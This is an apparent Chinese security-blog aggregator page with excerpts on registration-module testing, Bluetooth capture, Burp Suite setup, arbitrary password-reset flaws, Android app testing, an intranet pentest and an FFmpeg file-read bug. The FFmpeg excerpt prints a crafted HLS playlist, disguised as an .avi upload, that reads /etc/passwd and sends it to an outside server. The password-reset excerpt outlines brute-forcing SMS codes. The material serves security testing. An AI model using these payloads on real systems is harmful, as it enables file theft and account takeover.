记录黑客技术中优秀的内容, 传播黑客文化,分享黑客技术精华

注册模块上线前安全测试checklist

许多应用系统都有注册模块,正常用户通过注册功能,获得应用系统使用权限;而非法用户通过注册模块,则是为了达到不可告人的目的,非法用户可以通过注册模块与服务端进行交互(一切用户输入都不可信),因此系统上线前,有必要对注册模块进行重点测试。 一、注册模块是否面向大众 根据系统业务需求,分析注册模块面向群体;如果是面向大众,则注册模块应该放在显而易见的地方;比如freebuf的注册功能 重点要强调一下面向内部的注册功能,此时注册模块应该是尽可能的隐藏起来。对内部注册模块隐藏的是否完美,上线前就必须进行测试。红军视角(黑盒测试):通过目录扫描、审查源代码、爬取js文件,发现隐藏的用户注册接口,比如未删除的注释,还可借助社工思维,比如登录地址为www.xxx.com/userLogin,可猜测注册地址为www.xxx.c
发布时间:2020-02-20 11:17 | 阅读:10144 | 评论:0 | 标签:WEB安全 CheckList 安全测试 注册模块

【蓝牙安全】蓝牙安全测试环境搭建(移动手机篇)

阅读: 59该篇文章主要讲蓝牙设备的测试环境搭建以及能使用到的程序。文章目录移动手机抓取蓝牙数据包蓝牙测试app移动手机抓取蓝牙数据包主要是应用在含有配套蓝牙app的蓝牙系统中,比如共享单车的app。首先是抓取蓝牙通信数据,Android方法是:第一步:在开发者选项项目选择Enable Bluetooth HCI snoop log/启用蓝牙 HCI 信息收集日志MTK的手机开启方式有一些不同具体办法如下第二步:进入adb模式中adb rm /sdcard/btsnoop_hci.log或者btsnoop_hci文件。第三步:进行蓝牙功能操作后执行adb pull /sdcard/btsnoop_hci.log或者btsnoop_hcid:/btpacket/btsnoop_hci.log第四步:最后使用wir
发布时间:2018-03-27 15:05 | 阅读:376260 | 评论:0 | 标签:安全分享 安全测试 蓝牙 蓝牙安全 蓝牙安全测试环境 移动

burpsuite抓包https请求相关

换工作或者更换电脑,使用burpsuite抓https的时候总是需要配置一下,记性大不如从前,还是在博客上记录下吧。 移动端抓https的接口,ios设置好代理,直接访问代理指向的burpsuite客户端所在的主机ip和端口,就可以下载安装证书。但是对于Android,.cer的证书文件是没有办法直接安装的,我常用的解决办法如下: 1,firefox设置好代理之后,打开一个https的请求,在地址栏最前面会有一个绿色的锁头标志,点开之后在更多信息选项可以查看burpsuite的证书,然后导出一下就是.crt的证书格式; 2,以android模拟器为例,用adb命令将导出的本地文件push到模拟器中: ./adb push /Users/nxadmin/Downloads/PortSwiggerCA.crt /s
发布时间:2017-11-19 08:50 | 阅读:183021 | 评论:0 | 标签:移动安全 burpsuite使用帮助 burpsuite抓https burpsuite抓包 https抓包 安全测试

任意用户密码重置的10种姿势

以前安全测试最爱挖的就是任意用户密码重置,今天看了carry_your师傅在ichunqiu上的视频文字总结一下任意用户密码重置的10种姿势: 1,短信验证码可爆破; 视频案例中输入手机号码、图片验证码就可以获取短信验证码,并且新密码也是在一个页面中,但是输入短信验证码之后,后端有个请求会判断短信验证码是否正确,错误的话页面会有提醒。攻击者可以用这个请求来爆破验证码,获取到正确的短信验证码之后就可以重置任意用户密码了。 缺陷主要是两个方面,第一,未对短信验证码的失效时间进行限制;第二,功能设计存在缺陷,如果设计成整个功能只用最后一个请求,包含注册手机号码、图片验证码、短信 验证码、新密码,对这个请求中手机号码、短信验证码的匹配以及短信验证码的正确性进行验证,攻击者就没办法进行爆破。当然前提是有正确运用图片验证码
发布时间:2017-11-01 22:30 | 阅读:146332 | 评论:0 | 标签:Web安全 渗透测试 任意用户密码重置漏洞 安全测试 密码重置漏洞

Gartner:2018年信息安全开支将达930亿美元

Gartner预测,世界范围内信息安全开支在2017年将达864亿美元,比去年增长7%;2018年则预计可达930亿美元。增长最快的领域是安全服务;尤其是IT外包、咨询和实施服务。唯一有可能减缓增长的领域,是硬件支持服务——随着虚拟设备、公共云和安全即服务(SaaS)解决方案的持续采用而变得没那么必要。因此,大部分的增额预计来自升级IT基础设施到更安全的态势,而非简单地买入额外的安全产品。Gartner首席研究分析师西德·德什潘德称:“提升安全不仅仅是购买新技术。正如最近一连串全球性安全事件所呈现的,做好最基本的安全操作才是最重要的。公司企业仅仅通过解决好基本的安全和风险相关卫生元素,就可大幅改善自身安全态势,比如以威胁为中心的漏洞管理、集中式日志管理、内部网络分隔、备份和系统强化等。”安全测试市场的增长也相对
发布时间:2017-08-18 12:35 | 阅读:106726 | 评论:0 | 标签:行业动态 Gartner 安全服务 安全测试 数据防泄漏 网络安全市场 网络安全法

如何最大化的将漏洞扼杀在摇篮里

安全攻城狮在公司存在之初,刚开始更多进行的是救火的工作,救火工作并不能从根源上解决漏洞的产生。 如何最大化的将漏洞扼杀在产生之初,这个实际上某个dalao提的问题,问了几位老司机,做一下小笔记。 1,定期化的安全培训,需要注重培训效果、培训次数、培训覆盖面、帮助文档、培训反馈; 2,系统设计阶段,就需要安全测试小伙伴的介入,了解开发过程、熟悉业务流程,只有掌握足够多的信息,才能发现更多的问题; 3,在目标系统测试环境部署支持agent的扫描器,部署agent之后,可以和扫描器进行联动; 4,给功能测试、性能测试同学开发安全相关插件,插件的功能是收集系统的各种请求,并上报给扫描器进行自动化扫描; 5,部署针对测试网段的流量镜像,从流量中提取分离出URL,进行自动化扫描。 6,黑盒测试、白盒代码审计也是必须的。 以
发布时间:2017-03-09 20:40 | 阅读:115326 | 评论:0 | 标签:渗透测试 web安全测试方法 安全测试 自动化漏洞扫描器 漏洞

“让开发者爱上安全测试”系列之源码安全测试谁负责?

前言 顺着应用安全的发展,对于源代码安全测试,在源代码层面是进行安全漏洞的测试与防范,避免产生所谓的“0-day”漏洞,现在已是大家的共识,成为构建软件安全保障体系中必备环节。但我也常常听到有人抱怨“源代码安全测试很难开展,总是遇到这样那样的问题,分工不明,权责不清,配合变成对抗,最后导致虎头蛇尾,甚至是执行不下去,留以形势,无法产生实际作用。 那么今天我们就来讨论一下,企业内部怎样开展源代码安全测试?到底谁来负责源代码安全测试,才能使其有效地执行,事半功倍? 源代码安全测试归准? 我们把今天这个话题,变成一个相对具体的问题来讨论吧: 软件源代码安全测试工作到底应该归属于哪个部门?是测试部门?是安全部门?还是开发部门? 作为一直致力于为用户提供最佳的软件源代码安全测试解决方案的我,这个问题是我必须思考和解决的
发布时间:2016-12-10 00:45 | 阅读:137849 | 评论:0 | 标签:术有专攻 安全测试 开发 源代码

“让开发者爱上安全测试”系列之“源码安全测试”——开发者之伤

源代码安全测试不再是新鲜话题,在很多的企业已经开展了相关工作,对于已经开展此项目工作的企业来说,我想问的问题则是“在你的源代码安全测试工作中所面临的最大阻力是什么?” 这个问题不同的企业可能有不同的答案,且各有各的道理。 其实,据我总结来看,很多的阻力表象最终都可以归结为“开发人员不配合”的问题。那为什么开发人员不配合源代码安全的相关工作呢?换句话说:如何让开发者爱上安全测试呢? “源代码安全测试”——想说爱你不容易 对于开发者而言,源代码安全测试不是我们不想做,也不是我们不愿意配合工作,而是总有这样那样的问题,让我们实在爱不起来。原因归纳总结如下: 1. 测试的范围不清楚 对于安全,我们都知道一个道理,没有绝对的安全只有相对的安全。在很多企业中,源代码安全测试的范围和标准都是由安全部门一手“包办”的。确定哪
发布时间:2016-11-29 16:00 | 阅读:119478 | 评论:0 | 标签:术有专攻 安全审计 安全测试 开发 思客云

“让开发者爱上安全测试”系列之软件安全漏洞谁之错? ——我为软件开发者正名

做软件安全这么多年,一直都在讲述一个理念:“软件开发人员是软件的缔造者,也是软件安全漏洞的制造者,应该为软件安全漏洞负责。”其实有的时候想想,这种“扣帽子”的讲法挺不对起广大的“程序猿”们。当然,这也不是只我一个人这么讲了。所以今天我们一起来聊一聊软件安全漏洞的产生原因,到底是不是我们可爱的“程序猿”的错? 聊之前,我们先明确两个软件安全的定义,今天也把它作为这篇文章的背景吧。 1. 什么是软件安全? 2. 什么是软件安全漏洞? 软件安全漏洞产有根源? ―――“如今的黑客主要利用软件自身存在安全漏洞进行攻击。而这些软件安全漏洞产生的根本原因是由于不良的软件架构和不安全的编码产生的。” (注:出自《Software Security》2005 Gary McGraw USA) 从上面的两个定义上看,不是“开发
发布时间:2016-11-24 19:55 | 阅读:123189 | 评论:0 | 标签:术有专攻 安全测试 安全漏洞 开发安全 漏洞

IoT: 物联网安全测试经验总结

前言 今年早些时候,我参与了许多关于物联网解决方案的安全测试。主要目标是找出体系结构和解决方案中的漏洞。在这篇文章中,我将讨论一些与物联网解决方案的问题和挑战。 什么是物联网? 在你学习有关IPv6的时候,你的老师或许说过,有一天在你的房子每个设备都会有一个IP。物联网基本上就是处理每天的事务,并把它们连接到互联网上。一些常见的物联网设备:如灯光,窗帘,空调。也有像冰箱这样的不太常见的设备,甚至一个卫生间?(实际应用) 物联网的定义是:“提出了互联网的发展,日常物品有网络连接,允许,发送和接收数据。”。 物联网体系结构 通常有这五个部分: 执行器:通过物理过程控制事物,如空调机组,门锁,窗帘, 网关:用于收集传感器信息和控制中心 传感器:用于检测环境,例如光,运动,温度,湿度,水/电量, 云:Web界面或A
发布时间:2016-11-03 01:35 | 阅读:180619 | 评论:0 | 标签:终端安全 IoT 安全测试 物联网 物联网安全

魅族科技安全测试团队招聘

魅族公司成立于2003年。创始人从小沉迷电子热爱科技,魅族就是电子梦想和共赢理念的结晶。从创立以来的一次次飞跃不仅是魅族人热爱追求的结果,更是梦想力量的体现。 安全测试工程师 岗位职责: 负责公司互联网产品安全测试(web、安卓移动) 负责安全测试体系建立和维护 负责安全测试技术的研究和培训安全测试工作 负责线上安全漏洞跟进 职位要求: 大专或以上学历,计算机相关专业 精通OWASP TOP10 的漏洞,能深刻理解这些漏洞 熟练掌握多种常用安全测试工具,能够搭建各类渗透测试的测试环境 熟悉常见脚本语言,恶意代码检测和分析,能够根据需要编写测试脚本或者工具 有较强的分析和解决问题能力、沟通能力和文档编写能力良好的工作态度、职业道德、团队合作意识 强烈的安全研究愿望和专注的研究能力 工作地点:广东珠海 投
发布时间:2016-10-20 23:30 | 阅读:105643 | 评论:0 | 标签:招聘 安全测试 魅族招聘 魅族科技

FFmpeg文件读取漏洞测试及利用

昨天经历过ImageMagick命令执行漏洞的洗礼之后,今天又有FFmpeg文件读取漏洞,真是激情的一周啊! 看了老外写的文章,大概理解的利用方式如下: #EXTM3U #EXT-X-MEDIA-SEQUENCE:0 #EXTINF:10.0, concat:http://www.nxadmin.com/header.m3u8|file:///etc/passwd #EXT-X-ENDLIST 以上内容保存成test.avi,是用来上传到被攻击服务器的。 #EXTM3U #EXT-X-MEDIA-SEQUENCE:0 #EXTINF:, http://www.nxadmin.com? 以上内容保存成header.m3u8,将header.m3u8上传到你的服务器,然后把test.avi上传到攻击服
发布时间:2016-05-06 19:40 | 阅读:97600 | 评论:0 | 标签:Web应用漏洞 ffmpeg文件读取漏洞 安全测试 文件读取漏洞 渗透测试 漏洞

工具推荐:Appie,轻便的Android集成渗透测试环境

Appie (Android Pentesting Portable Integrated Environment)是一个预配置好的软件包,可以运行在任何基于Windows的机器上作为Android渗透测试环境。它非常轻便,集成了主流的Android应用安全评估、Android取证、Android恶意软件分析工具,可以用来替代传统的虚拟机渗透测试环境。 Appie和现有Android渗透测试环境的区别     Appie中集成的工具是运行在宿主机器上的而不是运行在虚拟机中的;    Appie需要的空间更少,它只要1.5G左右,而传统的虚拟机需要至少10G;    Appie非常便携,
发布时间:2016-03-18 23:15 | 阅读:104522 | 评论:0 | 标签:工具 安全测试 安卓 Android

Android APP安全测试基础

自从去了新公司之后,工作太忙,变的有点懒了,很久没有更新Blog。今天跟几个小伙伴一起吃饭,小伙伴提起我的Blog,想想是该更新更新了,就把我投稿给sobug的这篇转过来吧,关于Android app安全测试的基础东东,在Sobug 的url: https://sobug.com/article/detail/7 背景 最近这两年移动端真是非常火,每个单位或多或少都会有那么几款App,对于我们Web安全攻城师来说,App安全也需要或多或少的了解一些。年初单位来了一位对App安全略有研究的小伙伴,某日闲来无事教了笔者几招,分享给大家。有句古语:”工欲善其事,必先利其器”,我们要研究App安全,没有几款高大上的神器是会非常麻烦的,因此本文主要给大家分享一下笔者学到的一些基础知识,主要是一些移动端测试辅助工具的使用。
发布时间:2015-02-08 13:10 | 阅读:126773 | 评论:0 | 标签:安全工具 app安全测试 web安全 安全测试 渗透测试 移动安全 Android

Android APP安全测试之使用调试器

继上一篇《Android APP安全测试入门》之后,我们又来到了本篇文章,即利用调试器来进行Android APP安全测试。 方法简介 本方法的独特之处是,我们并不需要获取Android设备的root权限。利用该方法我们可以逐步进入到APP的内部,一步一步地学习到该应用的实现逻辑,并有可能获得有关该APP的关键信息或敏感算法,例如在加密前拦截数据流,获取加密密钥、密码以及其他敏感数据等。此外,对移动应用渗透测试人员和有深入了解Android平台攻击方式想法的开发者来说,本方法将会是一个很好的选择。 本篇文章流程安排如下: 所需工具列表 Android设备设置 检查APP是否可调试 修改AndroidManifest.xml开启APP调试功能 IDE准备 Dump apk并反编译获取Java源代码 附加调试器
发布时间:2015-01-29 02:40 | 阅读:118350 | 评论:0 | 标签:移动安全 Android APP Dump apk root权限 反编译 安全测试 调试器

记一次内网渗透

前言 一客户,指定要给其公司做安全测试可从网络层面做,也可以人肉社工 :-) 对于一个小清新来说,怎么可以做人肉社工呢,要是把对方公司的妹子骗走怎么办,于是果断交给单身的同事去做了。 自己默默的看站,客户扔过来的一个域名,域名是a.com,其他什么信息都没有。 信息收集 Google搜了下,得到了一批二级域名;开起kali用fierce来一轮域名枚举,成功枚举出某域名下的子域名列表。   可以看到邮件服务器的域名是mail.a.com,采用微软的exchange所搭建。 再用Nslookup看了下mx记录,发现是 smtp1.a.com,smtp2.a.com,也就是说目标邮件服务器不是用的腾讯或者谷歌之类的企业邮箱,而是他们自己的邮件服务器。 因为一般这种情况下 邮件服务器所在的ip地址段就是
发布时间:2015-01-14 20:15 | 阅读:182667 | 评论:0 | 标签:内网渗透 020001 Boom DMZ DMZ区 fierce HTRAN ipconfig /all K8飞刀 ka

公告

九层之台,起于累土;黑客之术,始于阅读

推广

工具

标签云